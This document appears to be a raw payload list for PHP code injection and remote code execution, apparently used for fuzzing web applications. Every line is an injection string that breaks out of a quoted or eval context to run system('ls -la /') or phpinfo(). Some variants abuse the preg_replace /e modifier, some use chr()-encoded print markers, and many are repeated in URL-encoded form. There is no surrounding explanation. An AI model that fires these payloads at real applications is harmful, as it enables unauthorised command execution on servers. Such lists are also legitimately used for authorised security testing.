hacker".system('ls -la /'); #
system("ls -la /")
/lamer/e
Hello lamer
hacker%22.system%28%27ls%20-la%20%2F%27%29%3B%20%23
admin".system('ls -la /');#
admin".system('ls -la /');
admin".system('ls -la /'):
admin".system('ls -la /')
admin%22.system%28%27ls%20-la%20%2F%27%29%3B%23
root".system('ls -la /'); %23
root".system('ls -la /');
root";system('ls -la /'); %23
root";system('ls -la /'); 
root%22.system%28%27ls%20-la%20%2F%27%29%3B%20%2523
id);}system('ls -la /');#
id);}system('ls -la /');
id),}system('ls -la /');
hacker".phpinfo(); #
hacker%22.system%28%27ls%20-la%20%2F%27%29%3B%20%23
admin".phpinfo();#
admin".phpinfo();
admin".phpinfo():
admin".phpinfo()
admin%22.system%28%27ls%20-la%20%2F%27%29%3B%23
root".phpinfo(); %23
root".phpinfo();
root";phpinfo(); %23
root";phpinfo(); 
root%22.system%28%27ls%20-la%20%2F%27%29%3B%20%2523
id);}phpinfo();#
id);}phpinfo();
id),}phpinfo();
id),}phpinfo();#
id%29%2C%7Dsystem%28%27ls%20-la%20%2F%27%29%3B%23
id):}phpinfo(); %23
id):}phpinfo();
phpinfo()&pattern=/lamer/e&base=Hello lamer
hacker'.phpinfo().'
hacker"; $name = " kod"; echo $name; //
hacker'.phpinfo().'
id"; $name = " kod"; echo $name; //
id"; phpinfo(); //
id".system(%27ls%20-la%20/%27);%20%23
id"; phpinfo(); //
hacker".system(%27ls%20-la%20/%27);%20%23
id);}phpinfo();%23
id):}phpinfo(); %23
phpinfo()&pattern=/lamer/e&base=Hello lamer
Hello lamer
/lamer/e
%2Flamer%2Fe
phpinfo()
phpinfo()&pattern=/lamer/e&base=Hello lamer
system%28%22ls%20-la%20%2F%22%29%26pattern%3D%2Flamer%2Fe%26base%3DHello%20lamer
hacker'.phpinfo();%23
id'.phpinfo();%23
id'"phpinfo();%23
id'.system"("ls -la /");%23
id%27.system%28%22ls%20-la%20%2F%22%29%3B%2523
hacker%27.system%28%22ls%20-la%20%2F%22%29%3B%2523
${@print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110))}
id),}system('ls -la /');#
id%29%2C%7Dsystem%28%27ls%20-la%20%2F%27%29%3B%23
id):}system('ls -la /'); %23
id):}system('ls -la /');
system('ls -la /')&pattern=/lamer/e&base=Hello lamer
hacker'.system('ls -la /').'
hacker"; $name = " kod"; echo $name; //
hacker'.system('ls -la /').'
id"; $name = " kod"; echo $name; //
id"; system("ls -la /"); //
";print(chr(122).chr(97).chr(112).chr(95).chr(116).chr(111).chr(107).chr(101).chr(110));$var="
id".system(%27ls%20-la%20/%27);%20%23
id"; system("ls -la /"); //
hacker".system(%27ls%20-la%20/%27);%20%23
id);}system('ls -la /');%23
id):}system('ls -la /'); %23
phpinfo()&pattern=/lamer/e&base=Hello lamer
Hello lamer
/lamer/e
%2Flamer%2Fe
system("ls -la /")
system("ls -la /")&pattern=/lamer/e&base=Hello lamer
system%28%22ls%20-la%20%2F%22%29%26pattern%3D%2Flamer%2Fe%26base%3DHello%20lamer
hacker'.system("ls -la /");%23
id'.system("ls -la /");%23
id'"system("ls -la /");%23
id'.system"("ls -la /");%23
id%27.system%28%22ls%20-la%20%2F%22%29%3B%2523
hacker%27.system%28%22ls%20-la%20%2F%22%29%3B%2523

